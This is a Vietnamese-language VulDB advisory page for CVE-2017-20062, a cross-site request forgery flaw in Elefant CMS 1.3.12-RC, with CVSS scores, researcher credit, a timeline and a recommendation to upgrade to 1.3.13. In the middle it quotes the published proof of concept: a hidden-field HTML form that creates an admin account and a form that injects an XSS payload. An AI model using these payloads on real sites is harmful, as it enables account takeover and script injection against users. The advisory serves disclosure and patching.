| CVSS Điểm tạm thời meta | Giá khai thác hiện tại (≈) | Điểm quan tâm CTI |
|---|---|---|
| 4.3 | $0-$5k | 0.00 |
Tóm tắt
Một điểm yếu phân loại là Có vấn đề đã xuất hiện trong Elefant CMS 1.3.12-RC. Bị ảnh hưởng là một hàm không xác định. Việc thao tác dẫn đến Giả mạo yêu cầu liên trang. Lỗ hổng này được biết đến với tên CVE-2017-20062. Có khả năng tiến hành cuộc tấn công từ xa. Hơn nữa, đã có mã khai thác sẵn sàng. Khuyến nghị nâng cấp thành phần bị ảnh hưởng.
Chi tiết
Một điểm yếu phân loại là Có vấn đề đã xuất hiện trong Elefant CMS 1.3.12-RC. Bị ảnh hưởng là một hàm không xác định. Việc thao tác dẫn đến Giả mạo yêu cầu liên trang. Khai báo vấn đề bằng CWE sẽ dẫn tới CWE-352. Lỗ hổng đã được công bố vào 16/02/2017 bởi Tim Coen với Curesec Research Team dưới mã Elefant CMS 1.3.12-RC: CSRF dưới dạng Mailinglist Post (Full-Disclosure). Bạn có thể tải khuyến nghị này tại seclists.org.
Lỗ hổng này được biết đến với tên CVE-2017-20062. Có khả năng tiến hành cuộc tấn công từ xa. Không có thông tin chi tiết kỹ thuật. Độ phức tạp của một cuộc tấn công là khá cao. Khả năng khai thác được cho là khó khăn. Mức độ phổ biến của lỗ hổng này dưới mức trung bình. Hơn nữa, đã có mã khai thác sẵn sàng. Lỗ hổng đã được công khai và có thể bị khai thác. Hiện tại, giá cho một khai thác có thể vào khoảng USD $0-$5k.
Nếu có độ dài, thì nó được khai báo là bằng chứng khái niệm. Bạn có thể tải về mã khai thác tại seclists.org. Lỗ hổng đã bị khai thác dưới dạng zero-day chưa được công bố trong tối thiểu 283 ngày. Là 0-day, giá ước tính trên thị trường ngầm vào khoảng $0-$5k. Mã được sử dụng bởi khai thác là:
<html> <body> <form action="http://localhost/user/add"; method ="POST"> <input type="hidden" name="name" value="admin3" /> <input type= "hidden" name="email" value="admin3 () example com" /> <input type="hidden" name= "password" value="admin3" /> <input type="hidden" name="verify_pass" value= "admin3" /> <input type="hidden" name="type" value="admin" /> <input type= "hidden" name="company" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name= "photo" value="" /> <input type="hidden" name="about" value="" /> <input type= "hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name= "address2" value="" /> <input type="hidden" name="city" value="" /> <input type ="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value= "Submit request" /> </form> </body> </html> XSS: <html> <body> <form action= "http://localhost/designer/preview"; method="POST"> <input type="hidden" name= "layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value= "Submit request" /> </form> </body> </html>
Cập nhật lên phiên bản 1.3.13 có thể xử lý vấn đề này. Khuyến nghị nâng cấp thành phần bị ảnh hưởng.
Sản phẩm
Loại
Nhà cung cấp
Tên
Phiên bản
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Độ tin cậy: 🔍
CVSSv3
VulDB Điểm cơ sở meta: 5.0VulDB Điểm tạm thời meta: 4.3
VulDB Điểm cơ sở: 5.0
VulDB Điểm tạm thời: 4.3
VulDB Vector: 🔍
VulDB Độ tin cậy: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Véc-tơ | Độ phức tạp | Xác thực | Bí mật | Toàn vẹn | Khả dụng |
|---|---|---|---|---|---|
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
VulDB Điểm cơ sở: 🔍
VulDB Điểm tạm thời: 🔍
VulDB Độ tin cậy: 🔍
Nhà nghiên cứu Điểm cơ sở: 🔍
Khai thác
Lớp: Giả mạo yêu cầu liên trangCWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍
Vật lý: Không
Cục bộ: Không
Từ xa: Có
Khả dụng: 🔍
Truy cập: Công khai
Trạng thái: Bằng chứng khái niệm
Tác giả: Tim Coen
Tải xuống: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Dự đoán giá: 🔍
Ước tính giá hiện tại: 🔍
| 0-Day | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
|---|---|---|---|---|
| Hôm nay | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
Tình báo mối đe dọa
Sự quan tâm: 🔍Diễn viên đang hoạt động: 🔍
Nhóm APT đang hoạt động: 🔍
Biện pháp đối phó
Khuyến nghị: nâng cấpTrạng thái: 🔍
Thời gian 0-ngày: 🔍
Thời gian trễ khai thác: 🔍
nâng cấp: CMS 1.3.13
dòng thời gian
09/05/2016 🔍16/02/2017 🔍
16/02/2017 🔍
24/02/2017 🔍
18/06/2022 🔍
Nguồn
Khuyến cáo: Elefant CMS 1.3.12-RC: CSRFNhà nghiên cứu: Tim Coen
Tổ chức: Curesec Research Team
Trạng thái: Không được định nghĩa
CVE: CVE-2017-20062 (🔍)
GCVE (CVE): GCVE-0-2017-20062
GCVE (VulDB): GCVE-100-97259
scip Labs: https://www.scip.ch/en/?labs.20161013
Xem thêm: 🔍
mục
Được tạo: 24/02/2017 15:48Đã cập nhật: 18/06/2022 16:19
Thay đổi: 24/02/2017 15:48 (55), 24/02/2017 15:49 (2), 18/06/2022 16:19 (3)
Hoàn chỉnh: 🔍
Cache ID: 216::103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Chưa có bình luận nào Ngôn ngữ: vi + km + en.
Vui lòng đăng nhập để bình luận